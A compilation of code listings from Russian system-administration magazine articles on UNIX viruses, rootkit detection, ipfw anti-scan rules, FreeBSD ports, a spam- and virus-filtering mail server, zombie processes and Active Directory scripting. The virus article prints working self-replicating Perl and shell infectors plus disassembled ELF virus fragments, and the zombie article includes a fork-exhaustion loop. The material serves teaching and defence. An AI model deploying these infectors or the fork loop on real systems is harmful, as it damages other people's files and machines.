Вирусы в UNIX, или Гибель «Титаника» II Крис Касперски Листинг 1. Пример вируса, обнаруживающего себя по стилю #!/usr/bin/perl #PerlDemo open(File,$0); @Virus=; @Virus=@Virus[0...6]; close(File); foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); } } } } Листинг 2. Фрагмент вируса UNIX.Tail.a, дописывающего себя в конец файла (оригинальные строки файла-жертвы выделены синим) #!/bin/sh echo "Hello, World!" for F in * do if ["$(head -c9 $F 2>/dev/null)"="#!/bin/sh" -a "$(tail -1 $F 2>/dev/null)"!="#:-P"] then tail -8 $0 >> $F 2>/dev/null fi done] Листинг 3. Фрагмент вируса UNIX.Head.b, внедряющегося в начало файла (оригинальные строки файла-жертвы выделены синим) #!/bin/sh for F in * do if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ] then head -11 $0 > tmp cat $F >> tmp mv tmp $F fi done echo "Hello, World!" Листинг 4. Фрагмент Perl-вируса UNIX.Demo #!/usr/bin/perl #PerlDemo open(File,$0); @Virus=; @Virus=@Virus[0...27]; close(File); foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); } } } } Листинг 6. 
Фрагмент файла, зараженного вирусом UNIX.NuxBe.quilt, «размазывающим» себя по кодовой секции .text:08000BD9 xor eax, eax .text:08000BDB xor ebx, ebx .text:08000BDD jmp short loc_8000C01 … .text:08000C01 loc_8000C01: ; CODE XREF: .text:0800BDD^j .text:08000C01 mov ebx, esp .text:08000C03 mov eax, 90h .text:08000C08 int 80h ; LINUX - sys_msync .text:08000C0A add esp, 18h .text:08000C0D jmp loc_8000D18 … .text:08000D18 loc_8000D18: ; CODE XREF: .text:08000C0D^j .text:08000D18 dec eax .text:08000D19 jns short loc_8000D53 .text:08000D1B jmp short loc_8000D2B … .text:08000D53 loc_8000D53: ; CODE XREF: .text:08000D19^j .text:08000D53 inc eax .text:08000D54 mov [ebp+8000466h], eax .text:08000D5A mov edx, eax .text:08000D5C jmp short loc_8000D6C Листинг 7. Фрагмент файла, зараженного вирусом UNIX.NuxBe.jullet, «0размазывающим» себя по секции данных .rodata:08054140 aFileNameTooLon db 'File name too long',0 .rodata:08054153 ; ---------------------------------------- .rodata:08054153 mov ebx, 1 .rodata:08054158 mov ecx, 8049A55h .rodata:08054158 jmp loc_80541A9 .rodata:08054160 ; --------------------------------------- .rodata:08054160 aTooManyLevelsO db 'Too many levels of symbolic links',0 .rodata:08054182 aConnectionRefu db 'Connection refused',0 .rodata:08054195 aOperationTimed db 'Operation timed out',0 .rodata:080541A9 ; --------------------------------------- .rodata:080541A9 loc_80541A9: .rodata:080541A9 mov edx, 2Dh .rodata:080541AE int 80h ; LINUX - .rodata:080541B0 mov ecx, 51000032h .rodata:080541B5 mov eax, 8 .rodata:080541BA jmp loc_80541E2 .rodata:080541BA ; --------------------------------------- .rodata:080541BF db 90h ; Р .rodata:080541C0 aTooManyReferen db 'Too many references: can',27h,'t splice',0 .rodata:080541E2 ; --------------------------------------- .rodata:080541E2 loc_80541E2: .rodata:080541E2 mov ecx, 1FDh .rodata:080541E7 int 80h ; LINUX - sys_creat .rodata:080541E9 push eax .rodata:080541EA mov eax, 0 .rodata:080541EF add [ebx+8049B43h], bh 
.rodata:080541F5 mov ecx, 8049A82h .rodata:080541FA jmp near ptr unk_8054288 .rodata:080541FA ; --------------------------------------- .rodata:080541FF db 90h ; Р .rodata:08054200 aCanTSendAfterS db 'Can',27h,'t send after socket shutdown',0 Листинг 10. Схема расположения кодовых секций типичного файла .init содержит инициализационный код .plt содержит таблицу связки подпрограмм .text содержит основной код программы .fini содержит термирующий код программы Листинг 11. Фрагмент утилиты ping, использующей, как и многие другие программы, относительные ссылки между секциями кодового сегмента .init:08000910 _init proc near ; CODE XREF: start+51vp .init:08000910 E8 6B 18 00 00 call sub_8002180 .init:08000915 C2 00 00 retn 0 .init:08000915 _init endp … .text:08002180 sub_8002180 proc near ; CODE XREF: _init^p Листинг 13. Фрагмент вируса Lotek, тщательно скрывающего свой интерес к ELF-файлам .text:08048473 mov eax, 0B9B3BA81h ; -"ELF" (минус "ELF") .text:08048478 add eax, [ebx] ; первые четыре байта жертвы .text:0804847A jnz short loc_804846E ;-> это не ELF Листинг 14. Фрагмент вируса Linux.ZipWorm, активно и небезуспешно противостоящего дизассемблеру IDA Pro .text:080483C0 push 13h .text:080483C2 push 2 .text:080483C4 sub ecx, ecx .text:080483C6 pop edx .text:080483C7 pop eax ; // EAX := 2. это вызов fork .text:080483C8 int 80h ; LINUX - ђ IDA не смогла определить имя вызова! Листинг 15. Пример нормальной стартовой функции с классическим прологом и эпилогом text:080480B8 start proc near text:080480B8 text:080480B8 push ebp text:080480B9 mov ebp, esp text:080480BB sub esp, 0Ch … text:0804813B ret text:0804813B start endp Листинг 16. 
Альтернативный пример нормальной стартовой функции .text:08048330 public start .text:08048330 start proc near .text:08048330 xor ebp, ebp .text:08048332 pop esi .text:08048333 mov ecx, esp .text:08048335 and esp, 0FFFFFFF8h .text:08048338 push eax .text:08048339 push esp .text:0804833A push edx .text:0804833B push offset sub_804859C .text:08048340 push offset sub_80482BC .text:08048345 push ecx .text:08048346 push esi .text:08048347 push offset loc_8048430 .text:0804834C call ___libc_start_main .text:08048351 hlt .text:08048352 nop .text:08048353 nop .text:08048353 start endp Листинг 17. Стартовый код вируса PolyEngine.Linux.LIME.poly .data:080499C1 LIME_END: ; Alternative name is 'main' .data:080499C1 mov eax, 4 .data:080499C6 mov ebx, 1 .data:080499CB mov ecx, offset gen_msg ; "Generates 50 [LiME] encrypted…" .data:080499D0 mov edx, 2Dh .data:080499D5 int 80h ; LINUX - sys_write .data:080499D7 mov ecx, 32h Что такое rootkits, и как с ними бороться Сергей Яремчук # nmap -v -P0 -sU -sT -p 1-65535 IP_ADDRESS # rpm -Va > file # rpm -Va S.5....T c /etc/hotplug/usb.usermap S.5....T c /etc/sysconfig/pcmcia # rpm -Uvh --force <имя_файла.rpm> # ./chkrootkit ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected # ./chkrootkit -r /mnt/test # ./chkrootkit -p /mnt/safebin # ./chkrootkit -x | more # ./ifpromisc eth0 is not promisc # find / -name "*.*" # kstat -p 270 # kstat -s SysCall Address sys_exit 0xc0117ce4 sys_fork 0xc0108ebc sys_read 0xc012604c sys_kill 0xc28465d4 WARNING! Should be at 0xc01106b4 # gcc -o rkscan rkscan1.0.c *** Don't run this scanner as root ! *** $ ./rkscan -=- Rootkit Scanner -=- -=- by Stephane.Aubert@hsc.fr -=- Scanning for ADORE version 0.14, 0.24 and 2.0b ... ADORE rootkit NOT DETECTED on this system. Scanning for KNARK version 0.59 ... KNARK rootkit NOT DETECTED on this system. Done.
Сам себе антихакер Защита от хакерских атак с помощью ipfw Сергей Супрунов # nmap [options] hosts tcpdump [ -adeflnNOpqStvx ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ expression ] # tcpdump host # tcpdump {src | dst} host # tcpdump [{src | dst}] port # tcpdump {tcp | udp | icmp} # tcpdump net 192.168.0.0 mask 255.255.255.0 # tcpdump net 192.168.0.0/24 # tcpdump 'tcp[13] & 18 != 0' # tcpdump 'tcp[13] & 63 = 63' # tcpdump 'tcp[13] & 63 = 0' Номер Действие Протокол from Источник to Приемник [Опции] # ipfw add number allow tcp from any to me setup limit src-addr 5 # nmap -sF # ipfw add number reject tcp from any to any not established tcpflags fin # ipfw add number reject tcp from any to any tcpflags fin,syn,rst,psh,ack,urg # ipfw add number reject tcp from any to any tcpflags !fin,!syn,!rst,!psh,!ack,!urg # ipfw add 10007 deny ip from any to any not verrevpath in # ipfw add 10007 deny log ip from any to any not verrevpath in option "IPFIREWALL_VERBOSE_LIMIT=100" # ipfw add number reject log logamount 5 tcp from any to any not established tcpflags fin $fwcmd add ПРАВИЛО $fwcmd add 100 pass all from any to any via lo0 $fwcmd add 200 deny all from any to 127.0.0.0/8 firewall_type="/etc/ipfw.conf" # Запрет X-сканирования: add 1001 reject log tcp from any to any tcpflags fin,syn,rst,psh,ack,urg # Запрет N-сканирования: add 1002 reject log tcp from any to any tcpflags !fin,!syn,!rst,!psh,!ack,!urg # Запрет FIN-сканирования: add 1003 reject log tcp from any to any not established tcpflags fin # Защита от спуфинга add 1004 deny log ip from any to any not verrevpath in # Ограничение числа одновременных соединений: add 1005 allow ip from any to any setup limit src-addr 10 Rule Set Based Access Control для Linux Сергей Яремчук # tar xvjf linux-2.4.22.tar.bz2 # cd linux # tar xvjf ../rsbac-v1.2.2.tar.bz2 # gzip -dc ../patch-2.4.22-v1.2.2.gz | patch -p1 # wget -c
http://www.rsbac.org/bugfixes/rsbac-bugfix-v1.2.1-1.diff # patch -p1 < rsbac-bugfix-v1.2.1-1.diff # make menuconfig # touch Makefile # make dep bzImage modules modules_install # tar xvzf rsbac-admin-v1.2.2.tar.gz # cd rsbac-admin-v1.2.2 # ./configure (если используется ядро, находящееся в каталоге, отличном от /usr/src/linux, его местонахождение указываем при помощи --with-kerneldir) # make && make install bash-2.05b# su secoff setuid: Operation not permitted Oct 31 22:58:13 stas kernel: rsbac_adf_request(): request CHANGE_OWNER, caller_pid 89, caller_prog_name sendmail, caller_uid 0, target-type PROCESS, tid 89, attr owner, value 15, result NOT_GRANTED by AUTH Безумный чертенок Александр Байрак 00100 allow ip from any to any via lo0 00200 deny ip from any to 127.0.0.0/8 00300 deny ip from 127.0.0.0/8 to any 65000 allow ip from any to any Эффективная работа с портами в FreeBSD Владимир Осинцев # cd /usr/ports # make search name=opera Port: opera-7.21.20031013 Path: /usr/ports/www/opera Info: A blazingly fast, full-featured, standards-compliant browser Maint: avleeuwen@piwebs.com Index: www B-deps: ... R-deps: ... ... # make search key=dvd Port: dvdrip-0.48.8 Path: /usr/ports/multimedia/dvdrip Info: This is dvd::rip, a Perl Gtk+ based dvd-ripper Maint: michaelnottebrock@gmx.net Index: multimedia B-deps: ... R-deps: ... ... # cd /usr/ports/Tools/scripts # ./portsearch -n "^xmms" -p "(audio|multimedia)" -i "plugin" # ./portsearch -n "^xmms" -f ftp://ftp.freebsd.org/pub/FreeBSD/branches/-current/ports/INDEX # cd /usr/ports && make index # cd /usr/ports/www/opera # make pretty-print-build-depends-list This port requires package(s) "XFree86-libraries-4.3.0_5 compat4x-i386-5.0.20030328 expat-1.95.6_1 fontconfig-2.2.0 freetype2-2.1.4_1 imake-4.3.0 perl-5.6.1_13 pkgconfig-0.15.0 png-1.2.5_2" to build. # pkg_info -R ORBit2-2.6.2 Information for ORBit2-2.6.2: Required by: libgnome-2.2.0.1 nautilus2-2.2.4 gnome2-2.2.1_1 ...
# pkg_info -xc sudo Information for sudo-1.6.7.4: Comment: Allow others to run commands as root # pkg_info -xL opera Information for opera-7.21.20031013: Files: /usr/X11R6/bin/opera /usr/X11R6/share/doc/opera/LICENSE /usr/X11R6/share/doc/opera/help /usr/X11R6/share/opera/bin/m2.so ... # cd /usr/ports # make readmes # pkg_version | less gnome2 = nvidia-driver < opera = vim < ... # pkg_version -l "<" nvidia-driver < vim < ... # pkg_version -v ftp://ftp.freebsd.org/pub/FreeBSD/branches/-current/ports/INDEX | less # cd /usr/ports/Tools/scripts # ./consistency-check # cd /usr/ports/sysutils/portupgrade # make install clean # portsclean -C Cleaning out /usr/ports/*/*/work... Delete /usr/ports/news/gnus-emacs20/work ... # portsclean -DD Detecting unreferenced distfiles... Delete /usr/ports/distfiles/KDE/qt-x11-free-3.1.2.tar.bz2 ... # cd /usr/ports/Tools/scripts # ./distclean # ENV['PKG_TMPDIR'] ||= '/var/tmp' ENV['PKG_TMPDIR'] ||= '/usr/tmp' # portsdb -Ufu # cd /usr/ports/multimedia/mplayer # make WITH_GUI=yes WITH_LANG=ru install clean MAKE_ARGS = { 'multimedia/mplayer-*' => 'WITH_GUI=yes WITH_LANG=ru', 'multimedia/xmms-*' => 'WITHOUT_MIKMOD=yes', } Почтовый сервер с защитой от спама и вирусов на основе FreeBSD Геннадий Дмитриев cd /home/user mkdir cvsup cd cvsup cd /home/user mkdir cvsup cd cvsup vi cvsup.ports # =====начало файла cvsup.ports========= *default host=cvsup.FreeBSD.org *default base=/usr *default prefix=/usr *default release=cvs *default tag=.
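*default delete use-rel-suffix compress
ports-mail
ports-net
ports-security
ports-sysutils
ports-www
# ===== end of file cvsup.ports ==========
vi cvsup.sh
# ======= start of file cvsup.sh ==========
#!/bin/sh
/usr/local/bin/cvsup -g -L 2 cvsup.ports
# ======= end of file cvsup.sh ===========
chmod +x cvsup.sh
/usr/ports/mail/sendmail
/usr/ports/mail/p5-Mail-SpamAssassin
/usr/ports/mail/spamass-milter
/usr/ports/mail/kavmilter
/usr/ports/mail/sendmail/work/sendmail-8.12.10/cf/cf
make mailer.conf
/usr/local/etc/mail/spamassassin/local.cf
# ========== start of file local.cf ========
# don't use agent
use_razor2 0
use_dcc 0
use_pyzor 0
# check rbl
skip_rbl_checks 0
# autowhitelist
use_auto_whitelist 1
auto_whitelist_path /var/spool/filter/.spamassassin/auto_whitelist
# bayes
use_bayes 1
bayes_path /var/spool/filter/.spamassassin/bayes
bayes_expiry_max_db_size 1500000
auto_learn 1
ok_languages en ru de
ok_locales en ru de
# rewrite subject
rewrite_subject 1
subject_tag *SPAM*_HITS_ points* :
required_hits 3.5
# user rules
allow_user_rules 0
# report options
always_add_report 1
report_safe 0
report_charset koi8-r
# score options
score FROM_ILLEGAL_CHARS 1.5
score HEAD_ILLEGAL_CHARS 1.5
score SUBJ_ILLEGAL_CHARS 1.5
score SUBJ_HAS_SPACES 2.5
score NO_REAL_NAME 1.0
score PENIS_ENLARGE 3.5
score PENIS_ENLARGE2 3.5
score FROM_HAS_MIXED_NUMS 1.0
score FORGED_IMS_TAGS 0.5
# network whitelist
# NOTE(review): whitelist_from keys on the From: header, which the sender
# controls; if a real host ever needs exempting, prefer a Received:-based
# whitelist rather than widening this list
whitelist_from localhost
whitelist_to spam@mycompany.ru
# ========== end of file local.cf =========
# ========= start of file spammerdaemon.sh ==
#!/bin/sh
# start/stop script for spamd
#
# The daemon is tracked through a pid file that spamd writes itself (-r)
# instead of grepping `ps ax` for the string "spamd": that match, executed
# as root, would kill whichever unrelated process happened to carry the
# string in its command line (an editor open on spamd.log, a tail -f, the
# spamd-training helper), and only the first hit at that.
# NOTE(review): a spamd started earlier without -r has no pid file and is
# invisible to this script; stop it by hand once.
SPAMD=/usr/local/bin/spamd
PIDFILE=/var/run/spamd.pid

# Print the pid recorded in PIDFILE if it is a plain number and the process
# still exists; return non-zero otherwise so callers can test it in "if".
spamd_pid() {
    [ -f "${PIDFILE}" ] || return 1
    read -r pid junk < "${PIDFILE}"
    # never hand arbitrary pid-file contents to kill
    case "${pid}" in
        ''|*[!0-9]*) return 1 ;;
    esac
    kill -0 "${pid}" 2>/dev/null || return 1
    echo "${pid}"
}

case "$1" in
start)
    if pid=`spamd_pid`; then
        echo "spamd already running (pid ${pid})" >&2
    else
        rm -f "${PIDFILE}"
        # -u filter drops root, -x ignores per-user configs, -r records the pid
        # NOTE(review): confirm spamd writes PIDFILE before switching to the
        # filter user; /var/run is not writable by that account
        [ -x "${SPAMD}" ] && "${SPAMD}" -d -a -u filter -x -s local5 -r "${PIDFILE}" && echo -n ' spamd'
    fi
    ;;
stop)
    if pid=`spamd_pid`; then
        kill "${pid}" >/dev/null 2>/dev/null && echo -n ' spamd'
        rm -f "${PIDFILE}"
    fi
    ;;
*)
    echo "Usage: `basename $0` {start|stop}" >&2
    ;;
esac
exit 0
# ========= end of file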
spammerdaemon.sh=== vipw filter:*:1025:1025::0:0:Mail Filter:/var/spool/filter:/sbin/nologin vi /etc/group filter:*:1025:filter mkdir /var/spool/filter chown filter:filter /var/spool/filter cd /var/log cat >./spamd.log chown filter:filter spamd.log # ========добавка в файл syslog.conf====== local5.* /var/log/spamd.log # =========конец файла syslog.conf======== # ======добавка в файл newsyslog.conf===== /var/log/spamd.log filter:filter 640 3 2000 * Z # =======конец файла newsyslog.conf======= INPUT_MAIL_FILTER(`spamassassin', `S=local:/var/run/spamass-milter.sock, F=, T=C:15m;S:4m;R:4m;E:10m') /usr/local/etc/rc.d/spamass-milter.sh # =======начало файла spamass-milter.sh=== #!/bin/sh DAEMON=/usr/local/sbin/spamass-milter SOCKET=/var/run/spamass-milter.sock PIDFILE=/var/run/spamass-milter.pid SPAMADRESS=spam@mycompany.ru case "$1" in start) if [ -f "${DAEMON}" -a -x "${DAEMON}" ] then "${DAEMON}" -b "${SPAMADRESS}" -p "${SOCKET}" -f & echo $! > "${PIDFILE}" sleep 1 kill -HUP `head -1 /var/run/sendmail.pid` echo -n ' spamass-milter running' fi ;; stop) if [ -f "${PIDFILE}" ] then read -r pid junk < "${PIDFILE}" kill ${pid} rm -f "${SOCKET}" "${PIDFILE}" sleep 1 kill -HUP `head -1 /var/run/sendmail.pid` echo -n ' spamass-milter stopped' fi ;; esac # ========конец файла spamass-milter.sh=== # =======начало файла AvpUnix.ini========= [AVP32] DefaultProfile=/usr/local/share/AVP/defUnix.prf [Configuration] KeysPath=/usr/local/share/AVP SetFile=avp.set BasePath=/usr/local/share/AVP/Bases SearchInSubDir=No UpdatePath=http://downloads2.kaspersky-labs.com/updates/ # ========конец файла AvpUnix.ini========= # =======начало файла defUnix.ini========= # same section with parameters for objects [Object] Names=*/home;*/tmp;*/var/tmp;/usr/src;/mnt/cdrom;/usr/tmp;/tmp/kav Memory=No Sectors=No ScanAllSectors=No Files=Yes FileMask=2 UserMask=*.tar.gz ExcludeFiles=0 ExcludeMask=*.txt *.cmd ExcludeDir= Packed=Yes Archives=Yes SelfExtArchives=Yes MailBases=Yes MailPlain=Yes Embedded=Yes 
InfectedAction=3 BackupInfected=No IfDisinfImpossible=1 Warnings=Yes CodeAnalyser=Yes RedundantScan=No SubDirectories=Yes CrossFs=Yes # global(common) options sections [Options] ScanRemovable=Yes ScanSubDirAtEnd=No ParallelScan=No LimitForProcess=16 EndlesslyScan=No ScanDelay=-1 Symlinks=1 [Report] Report=Yes UseSysLog=No ReportFileName=/var/log/kav/kavscan.rpt Append=Yes ReportFileLimit=Yes ReportFileSize=500 RepCreateFlag=600 ExtReport=No WriteTime=Yes WriteExtInfo=No UseCR=No RepForEachDisk=No LongStrings=Yes UserReport=No UserReportName=/var/log/kav/userreport.log # Showing objects ShowOK=No ShowPack=No ShowPassworded=No ShowSuspision=No ShowWarning=No ShowCorrupted=No ShowUnknown=No # Action with infected files [ActionWithInfected] InfectedCopy=No # Action with suspicion files [ActionWithSuspicion] SuspiciousCopy=No # Action with corrupted files [ActionWithCorrupted] CorruptedCopy=No [TempFiles] UseMemoryFiles=Yes LimitForMemFiles=6000 MemFilesMaxSize=20000 TempPath=/tmp [Priority] Father=0 Child=0 [Customize] Sound=No UpdateCheck=No UpdateInterval=90 OtherMessages=No RedundantMessage=No DeleteAllMessage=No ExitOnBadBases=Yes UseExtendedExitCode=Yes # ========конец файла defUnix.ini========= mkdir /var/log/kav mkdir /tmp/kav /usr/local/etc/kavmilter.conf # =======начало файла kavmilter.conf======== SendmailPipe = /var/run/kavmilter KAVPipe = /var/run/AvpCtl PIDFile = /var/run/kavmilter.pid TempDirectory = /tmp/kav KAVTimeout = 60 SendmailTimeout = 300 DebugLevel = 0 DaemonMode = yes InfectedAction = discard # ========конец файла kavmilter.conf======== # =======начало файла kavmilter.sh========== #!/bin/sh PREFIX=/usr/local/libexec PIPE=/var/run/kavmilter KAVPIPE=/var/run/AvpCtl PIDFILE=/var/run/kavmilter.pid TEMPDIR=/tmp/kav DPARMS="-D 0" case "$1" in start) rm -f ${PIPE} > /dev/null && ${PREFIX}/kavmilter ${DPARMS} > /dev/null && echo -n ' kavmilter' ;; stop) killall -TERM kavmilter > /dev/null && rm -f ${PIPE} && rm -f ${PIDFILE} && echo "kavmilter stopped" 
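;;
restart)
    killall -TERM kavmilter > /dev/null && rm -f ${PIPE} && rm -f ${PIDFILE} && sleep 5 && ${PREFIX}/kavmilter ${DPARMS} > /dev/null && echo "kavmilter restarted"
    ;;
*)
    echo "Usage: `basename $0` {start|stop|restart}" >&2
    ;;
esac
exit 0
# ======== end of file kavmilter.sh ==========
# ======= start of file kavdaemon.sh ==========
#!/bin/sh
# start/stop/restart script for kavdaemon (the AV scanning daemon that
# kavmilter talks to through the control pipe under AVPPIPE).
PREFIX="/usr/local/share/AVP"
BINDIR="/usr/local/share/AVP"
# NOTE(review): AVPDIR holds the daemon's pid file (AvpPid, tested below) and
# its scratch files, yet it lives under world-writable /tmp; any local user
# who creates /tmp/kav first owns the directory. kavmilter.conf points its
# TempDirectory at the same path, so both must move together (e.g. to a
# root-owned directory under /var) — confirm before changing.
AVPDIR="/tmp/kav"
AVPPIPE="/var/run"
DPARMS="-Y -f=$AVPPIPE -MP -dl -MD -I0 -o{$AVPDIR} $AVPDIR"
case "$1" in
start)
    $BINDIR/kavdaemon $DPARMS && echo -n ' kavdaemon'
    ;;
stop)
    # the original had a stray non-ASCII character before -ka (an encoding
    # artifact) that the daemon would have received as an extra argument
    [ -f $AVPDIR/AvpPid ] && $BINDIR/kavdaemon -ka > /dev/null && echo "kavdaemon terminated"
    ;;
restart)
    # was "> dev/null" (a relative path): the redirection fails unless the
    # current directory happens to contain dev/, and a failed redirection
    # means the daemon is never started again
    [ -f $AVPDIR/AvpPid ] && $BINDIR/kavdaemon -ka > /dev/null && $BINDIR/kavdaemon $DPARMS > /dev/null && echo 'kavdaemon restarted'
    ;;
*)
    echo "Usage: `basename $0` {start|stop|restart}" >&2
    ;;
esac
exit 0
# ======== end of file kavdaemon.sh ==========
# ======= start of file main.mc ===============
divert(-1)
divert(0)
include(`../m4/cf.m4')
VERSIONID(`$FreeBSD: src/etc/sendmail/freebsd.mc, v 1.10.2.11 2001/07/14 18:07:27 gshapiro Exp $')
OSTYPE(freebsd5)
DOMAIN(generic)
FEATURE(`no_default_msa')
DAEMON_OPTIONS(`Port=smtp, Name=MTA')
FEATURE(access_db, `hash -o -T /etc/mail/access')
FEATURE(blacklist_recipients)
FEATURE(local_lmtp)
FEATURE(mailertable, `hash -o /etc/mail/mailertable')
FEATURE(relay_based_on_MX)
FEATURE(virtusertable, `hash -o /etc/mail/virtusertable')
dnl Realtime Blocking List - AntiSpam Control
dnl NOTE(review): check that every list enabled below is still operated
dnl before relying on it; a retired DNSBL can answer positively for every
dnl query, which with this configuration rejects all inbound mail.
dnl FEATURE(dnsbl)
dnl FEATURE(dnsbl, `relays.osirusoft.com', `Mail rejected - see http://relays.osirusoft.com/')
FEATURE(dnsbl,`relays.ordb.org',`Mail rejected - see http://ordb.org/')
FEATURE(dnsbl,`blackholes.easynet.nl',`Mail rejected - see http://blackholes.easynet.nl/')
dnl FEATURE(dnsbl,`inputs.orbz.org', `Mail rejected - see http://orbz.org/')
dnl FEATURE(dnsbl,`relays.visi.com', `Mail rejected - see http://relays.visi.com/')
dnl FEATURE(dnsbl, `ex.dnsbl.org', `Mail rejected - see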
http://www.dnsbl.org/') dnl FEATURE(dnsbl,`blackholes.mail-abuse.org', `Mail rejected - see http://mail-abuse.org/') dnl FEATURE(dnsbl,`relays.mail-abuse.org',`Mail rejected - see http://work-rss.mail-abuse.org/') dnl FEATURE(dnsbl,`dialups.mail-abuse.org', `Mail rejected; see http://mail-abuse.org/dul/enduser.htm') dnl Russian DialUp Blocking List FEATURE(`dnsbl',`dul.ru',`Mail rejected - your are spammer') dnl Uncomment the first line to change the location of the default dnl /etc/mail/local-host-names and comment out the second line. dnl define(`confCW_FILE', `-o /etc/mail/sendmail.cw') define(`confCW_FILE', `-o /etc/mail/local-host-names') define(`confMAX_MIME_HEADER_LENGTH', `256/128') define(`confMAX_MESSAGE_SIZE', 5000000) define(`confNO_RCPT_ACTION', `add-to-undisclosed') define(`confPRIVACY_FLAGS', `authwarnings,noexpn,novrfy,noetrn,nobodyreturn,goaway, restrictmailq,restrictqrun') define(`confSMTP_LOGIN_MSG',`Antispam-MTA; "Non-authorized relaying DENIED." $b') define(`confMAX_RCPTS_PER_MESSAGE', `5') INPUT_MAIL_FILTER(`spamassassin', `S=local:/var/run/spamass-milter.sock, F=, T=C:15m;S:4m;R:4m;E:10m') INPUT_MAIL_FILTER(`kavmilter',`S=unix:/var/run/kavmilter,F=T') define(`confMILTER_LOG_LEVEL',`6') MAILER(local) MAILER(smtp) # ========конец файла main.mc=============== INPUT_MAIL_FILTER(`spamassassin', `S=local:/var/run/spamass-milter.sock, F=, T=C:15m;S:4m;R:4m;E:10m') INPUT_MAIL_FILTER(`kavmilter',`S=unix:/var/run/kavmilter,F=T') define(`confMILTER_LOG_LEVEL',`6') m4 main.mc>sendmail.cf =====начало файла===== Return-Path: narayan@epfl.ch Received: from flashmail.com ([200.75.94.146]) by ns.mycompany.ru (8.12.10/8.12.10) with SMTP id hB38USe7096329 for ; Wed, 3 Dec 2003 11:30:44 +0300 (MSK) (envelope-from narayan@epfl.ch) Date: Wed, 03 Dec 2003 06:35:56 +0000 From: narayan@epfl.ch Subject: =?Windows-1251?B?yvLuIOHz5OXyIOz98O7sPyE=?= To: Lan lan@mycompany.ru ………… ======конец файла===== cd /home/user mkdir spamd spamd/ham spamd/spam cd spamd vi 
spamd-training.sh ====начало файла spamd-training.sh==== #!/bin/sh sa-learn --ham /home/gennadiy/Spamd/ham/ sa-learn --spam /home/gennadiy/Spamd/spam/ =====конец файла spamd-training.sh==== chmod +x spamd-training.sh ./spamd-training.sh sa-learn --dump magic # =======начало файла start.sh=============== #!/bin/sh # my start script # kavdaemon - antiviral tolkien pro /usr/local/etc/script/kavdaemon.sh start # starting mail filter daemon /usr/local/etc/script/spammerdaemon.sh start /usr/local/etc/script/kavmilter.sh start /usr/local/etc/script/spamass-milter.sh start # ========конец файла start.sh=============== «Убиваем» зомби Андрей Уваров #include #include #include int main(){ // с этого места начинает своё выполнение потомок pid_t chld_PID= fork(); //если chld_PID == 0, то текущий процесс – потомок if(chld_PID!= 0){ printf("I'm a parent\n"); }else{ printf("I'm a child\n"); return 0; } #include #include #include int main(){ pid_t chld_PID= fork(); if(chld_PID!= 0){ printf("I'm a parent\n"); //остановим выполнение родителя до ввода символа getchar(); }else{ printf("I'm a child\n"); } return 0; } ps ax [dashin@dashin zombies]$ ps ax PID TTY STAT TIME COMMAND 1 ? S 0:05 init .............................................. 
18730 pts/4 S 0:00 bash -rcfile .bashrc 18767 pts/4 S 0:00 ./one_zomb 18768 pts/4 Z 0:00 [one_zomb ] 18864 pts/5 R 0:00 ps ax [dashin@dashin zombies]$ #include #include #include int main(){ pid_t our_child; while(our_child != -1){ our_child= fork(); if(our_child == 0){ return 0; } } getchar(); return 0; } [dashin@dashin zombies]$ ps ax bash: fork: Resource temporarily unavailable [dashin@dashin zombies]$ #include #include #include int main(){ pid_t our_child; our_child= fork(); if(our_child == 0){ return 0; } sleep(10); wait(); getchar(); return 0; } top -d 1 #include #include #include #include void killchld(){ wait(); } int main(){ pid_t our_child; int i; signal(SIGCHLD, killchld); for(i=1;i< 0xFF;i++){ our_child= fork(); if(our_child == 0){ return 0; } } getchar(); return 0; } #include #include #include #include int main(){ pid_t our_child; signal(SIGCHLD, SIG_IGN); //так делать не стоит int i; for(i=1;i< 0xFF;i++){ our_child= fork(); if(our_child == 0){ return 0; } } getchar(); return 0; } Active Directory - теория построения Иван Коробко Пример 1а Пример 1б i= Lbound(Array) For Each i in Array For i To Ubound(Array) element=Array(i) element=Array(i) next ……………………… Next Пример 2 Dim Array(100) …………………… For j=0 to Ubound(Array) For i=0 to Ubound(Array) If StrComp(Array_sort(i),Array_sort(i+1),0)=1 Then temp=Array(i) Array (i)=Array(i+1) Array(i+1)=temp End if Next Next Пример 3 Dim Array(100) ……………….. 
Dim SearchString="string" For i=0 to Ubound(Array) if Instr(Lcase(Array(i)),LCase(SearchString)) then MsgBox "Строка найдена" else MsgBox "Строка не найдена" End if Next Пример 4 temp="" Set gc = GetObject("GC:") For each child in gc temp=temp+child.name Next msgbox temp Пример 5: Set obj=GetObject("Protocol://ClassName") For each SubClass in ClassName temp=SubClass.Property Next Пример 5 Set obj=GetObject("ADs:") For Each provider IN obj temp = temp + provider.name + chr(13) Next MsgBox temp LDAP://HostName[:PortNumber][/DistinguishedName] WinNT:[//DomainName[/ComputerName[/ObjectName[,className]]]]